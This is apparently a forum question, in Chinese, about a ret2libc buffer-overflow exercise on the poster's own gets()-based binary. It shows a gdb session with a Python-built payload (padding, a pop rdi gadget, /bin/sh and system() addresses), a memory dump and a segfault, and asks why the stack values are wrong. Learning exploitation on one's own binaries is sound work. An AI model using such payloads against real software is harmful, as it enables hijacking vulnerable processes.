我在gdb中为ret2libc输入以下内容

(gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/Desktop/c_system/a < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")')

当我检查内存时，它在0x267de之后显示了错误的值

(gdb) x/4g $rbp
0x7fffffffe190: 0x4242424242424242      0x00000000000267de
0x7fffffffe1a0: 0x007fff370cf7b1ac      0x007ffff7e408a000

所有地址都正确，最后程序以分段错误结束

AAAAAAAAAABBBBBBBB�g


Program received signal SIGSEGV, Segmentation fault.
0x00000000000267de in ?? ()

选择的小工具是pop rdi;ret，它位于0x267de，/bin/sh位于0x7ffff7f7b1ac，system()位于0x7ffff7e408a0。gets（）用于输入缓冲区，缓冲区长度为10字节，源代码中不存在其他变量

为什么显示错误的值